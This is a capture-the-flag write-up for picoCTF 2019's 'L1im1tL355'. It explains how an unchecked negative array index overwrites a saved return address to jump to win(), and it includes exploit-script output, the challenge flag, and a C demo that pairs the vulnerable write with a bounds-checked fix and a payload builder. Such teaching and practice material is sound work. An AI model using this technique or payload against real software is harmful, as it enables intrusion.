
# L1im1tL355

## Problem

> Just pwn this program and get a flag. It's also found in /problems/l1im1tl355\_3\_d7480b654799978caea481ab65d5bbea on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/vuln.c)

## Solution

1. Looking at the [source code](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/vuln.c), the `replaceIntegerInArrayAtIndex()` function stands out: it is a thin wrapper around a plain array element assignment (`array[index] = value`), and nothing in it or in its caller validates `index`.
2. The program declares an array on the stack in `main()`, reads an integer value and an integer index from us, and stores the value into the array at that index as a DWORD (4 bytes). If we choose an in-bounds index (between `0` and `666/4`, since a DWORD is 4 bytes long), the write simply lands inside the array. But since the index is never checked and `array[index]` is just `*(array + index)`, a negative index writes `4 * |index|` bytes below the array base, which is exactly where the stack frame of `replaceIntegerInArrayAtIndex()` (its saved `ebp` and return address) sits while it is executing. So we give the address of `win()` as the "integer value you want to put in the array" and, as the "index in which you want to put the value", the offset in DWORDs from the array to the saved return address of `replaceIntegerInArrayAtIndex()`. When that function returns, execution lands in `win()`.
3. Stack layout, with lower addresses at the top and offsets given in DWORDs relative to the array base ([source](https://tcode2k16.github.io/blog/posts/picoctf-2019-writeup/binary-exploitation/#l1im1tl355)):

   ```
    lower stack address
    replaceIntegerInArrayAtIndex: stack data
    replaceIntegerInArrayAtIndex: saved ebp
    replaceIntegerInArrayAtIndex: return address (-5)
    main: other stack data
    main: array (+0)
    higher stack address
   ```
4. The exact distance from the array to the return address depends on the compiled frame layout, so the script brute-forces it: for each candidate offset it starts a fresh copy of `vuln`, sends the `win()` address as the value and the candidate as the index, and checks whether a flag comes back. The binary is not PIE, so `win()` sits at the fixed address `0x80485c6` and no leak is needed; and because the exploit is a single targeted DWORD write that skips over everything between the array and the return-address slot, a stack canary would not have caught it either. The script finds the offset to be `-5`, matching the layout above.
5. Run [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/L1im1tL355/script.py) with `python script.py USER=<username> PASSWORD=<password>`:

   ```
    [*] '/home/<username>/Documents/PicoCTF/Binary Exploitation/L1im1tL355/vuln'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)
    [+] Connecting to 2019shell1.picoctf.com on port 22: Done
    [*] <username>@2019shell1.picoctf.com:
        Distro    Ubuntu 18.04
        OS:       linux
        Arch:     amd64
        Version:  4.15.0
        ASLR:     Enabled
    [+] Opening new channel: 'pwd': Done
    [+] Receiving all data: Done (14B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] Working directory: '/tmp/tmp.SHO8IvJw16'
    [+] Opening new channel: 'ln -s /home/<username>/* .': Done
    [+] Receiving all data: Done (0B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] win address: 0x80485c6
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163772
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163776
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163780
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163784
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163788
    [+] Starting remote process b'/problems/l1im1tl355_3_d7480b654799978caea481ab65d5bbea/vuln' on 2019shell1.picoctf.com: pid 1163792
    [*] Offset was -5
    [+] picoCTF{str1nG_CH3353_3fe0db39}
   ```
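The bug and its fix side by side, as an added example that is not the challenge's `vuln.c` and not the author's `script.py`: it re-creates the unchecked `array[index] = value` pattern, puts a bounds-checked version next to it, simulates the `-5` overwrite inside one well-defined buffer (so the demo does not depend on the host compiler's frame layout), and builds the two input lines the exploit sends. The array length, the function names and the value-then-index prompt order are assumptions made for this example; the `win()` address `0x80485c6` is the one printed by the script above.

```c
/* Added example: unchecked-index write, checked replacement, simulated
 * return-address overwrite, and payload builder. Not the challenge's code. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ARRAY_LEN 256   /* assumed length for this demo; vuln.c's is not reproduced */

/* Bytes moved from the array base for a given index: one DWORD per step.
 * A negative index walks toward lower addresses, where the callee frame lives. */
long index_byte_offset(long index) {
    return index * (long)sizeof(int32_t);
}

/* The vulnerable pattern: a wrapper around array[index] = value with no check,
 * so an attacker-chosen index (including a negative one) is honoured as-is. */
void vulnerable_replace(int32_t *array, int32_t index, int32_t value) {
    array[index] = value;
}

/* Hardened form: refuse anything outside [0, len). `len` is an element count.
 * Returns 0 on success, -1 when the index is rejected. */
int checked_replace(int32_t *array, size_t len, long index, int32_t value) {
    if (index < 0 || (size_t)index >= len)
        return -1;
    array[index] = value;
    return 0;
}

/* Simulate the overwrite inside a single object so it is well-defined C:
 * backing[5..] plays main's array (+0 in the layout), backing[0] plays the
 * return-address slot five DWORDs below it (-5). Returns what ends up there. */
int32_t simulate_overwrite(int32_t index, int32_t value) {
    int32_t backing[16];
    memset(backing, 0x41, sizeof backing);    /* filler standing in for untouched stack */
    int32_t *array = &backing[5];
    vulnerable_replace(array, index, value);  /* index -5 lands on backing[0] */
    return backing[0];
}

/* Build the two lines vuln reads: the value first, then the index (prompt
 * order assumed from the writeup). The address is sent as a signed decimal
 * because the program parses it as an int. Returns bytes written or -1. */
int build_payload(uint32_t win_addr, long index, char *out, size_t outlen) {
    int n = snprintf(out, outlen, "%d\n%ld\n", (int32_t)win_addr, index);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

int main(void) {
    int32_t arr[ARRAY_LEN] = {0};
    char payload[64];

    printf("index -5 is %ld bytes from the array base\n", index_byte_offset(-5));
    printf("checked_replace: index -5 -> %d, index %d -> %d, index %d -> %d\n",
           checked_replace(arr, ARRAY_LEN, -5, 1),
           ARRAY_LEN, checked_replace(arr, ARRAY_LEN, ARRAY_LEN, 1),
           ARRAY_LEN - 1, checked_replace(arr, ARRAY_LEN, ARRAY_LEN - 1, 1));
    printf("return-address slot after vulnerable write: 0x%x\n",
           (unsigned)simulate_overwrite(-5, 0x80485c6));
    if (build_payload(0x80485c6u, -5, payload, sizeof payload) > 0)
        fputs(payload, stdout);   /* the two lines piped into vuln's stdin */
    return 0;
}
```

The simulation deliberately stays inside one array object: the real exploit relies on `array[-5]` walking into the caller's frame, which is undefined behaviour that only works because of how this particular binary was compiled, which is also why the writeup's script has to brute-force the offset rather than compute it.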

### Flag

`picoCTF{str1nG_CH3353_3fe0db39}`

